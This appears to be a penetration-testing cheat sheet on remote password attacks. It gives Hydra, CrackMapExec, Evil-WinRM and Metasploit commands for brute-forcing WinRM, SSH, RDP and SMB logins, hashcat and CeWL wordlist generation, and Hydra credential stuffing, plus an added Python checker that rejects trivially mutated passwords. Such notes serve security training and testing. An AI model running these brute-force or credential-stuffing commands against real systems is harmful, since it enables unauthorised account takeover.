Remote Password Attacks

Network Services

WinRM - 5985(HTTP), 5986(HTTPS)

CrackMapExec

# Installation
sudo apt-get -y install crackmapexec

# Usage
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm ip -u user.list -p password.list

Evil-WinRM

# Installation
sudo gem install evil-winrm

# Usage
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i ip -u user -p password

SSH

Hydra

# Brute Forcing 
hydra -L user.list -P password.list ssh://ip

Remote Desktop Protocol (RDP)

Hydra

# Brute Forcing
hydra -L user.list -P password.list rdp://ip

SMB

Hydra

# Brute Force
hydra -L user.list -P password.list smb://ip

Metasploit Framework

# Brute Forcing Module
use auxiliary/scanner/smb/smb_login

Password Mutations

Creating Wordlists

Hashcat

Function   Description
:          Do nothing.
l          Lowercase all letters.
u          Uppercase all letters.
c          Capitalize the first letter and lowercase the others.
sXY        Replace all instances of X with Y.
$!         Add the exclamation character at the end.

# Generating Rule-based Wordlist (--stdout prints the mutated candidates instead of cracking)
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

# Hashcat Existing Rules
ls /usr/share/hashcat/rules/
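
The rule functions in the table above, as an added example (not hashcat's own code and not part of these notes): a small Python interpreter for just those six functions, used from the defensive side to expand a banned-word list and reject passwords that are only trivial mutations of it. The rule-file text and base words are constructed samples.

```python
def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line (a sequence of the six functions above) to a word."""
    i = 0
    while i < len(rule):
        fn = rule[i]
        if fn == "l":                                  # lowercase all letters
            word = word.lower()
        elif fn == "u":                                # uppercase all letters
            word = word.upper()
        elif fn == "c":                                # capitalize first, lowercase the rest
            word = word[:1].upper() + word[1:].lower()
        elif fn == "s":                                # sXY: replace every X with Y
            word = word.replace(rule[i + 1], rule[i + 2])
            i += 2
        elif fn == "$":                                # $X: append character X
            word += rule[i + 1]
            i += 1
        elif fn not in ": ":                           # ':' is a no-op; spaces separate functions
            raise ValueError(f"unsupported rule function {fn!r} in {rule!r}")
        i += 1
    return word

def load_rules(text: str) -> list[str]:
    """Parse rule-file text: one rule per line, blank lines and '#' comments skipped."""
    lines = (ln.strip() for ln in text.splitlines())
    return [ln for ln in lines if ln and not ln.startswith("#")]

def expand(words: list[str], rules: list[str]) -> set[str]:
    """Every candidate from every (word, rule) pair, like `hashcat --stdout` above."""
    return {apply_rule(w, r) for w in words for r in rules}

def is_trivial_mutation(candidate: str, banned: list[str], rules: list[str]) -> bool:
    """Policy check: reject a password that some rule turns a banned base word into."""
    return candidate in expand(banned, rules)

# Constructed sample inputs (hypothetical custom.rule contents and banned-word list).
CUSTOM_RULE = """
# constructed custom.rule
l
c
sa@
c $!
c sa@ $!
"""
BANNED_WORDS = ["password", "Company"]

if __name__ == "__main__":
    rules = load_rules(CUSTOM_RULE)
    for pw in ["P@ssword!", "Company!", "correct horse battery"]:
        print(pw, "->", "rejected" if is_trivial_mutation(pw, BANNED_WORDS, rules) else "ok")
```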

CeWL

# Creating Wordlist (-d spider depth, -m minimum word length, -w output file)
cewl <https://Site.com> -d 4 -m 6 --lowercase -w created.wordlist

Password Reuse / Default Passwords

Credential Stuffing

# Hydra
# create a new list that separates credentials with a colon (username:password)
hydra -C <user_pass.list> <protocol>://<IP>

Last updated 2 years ago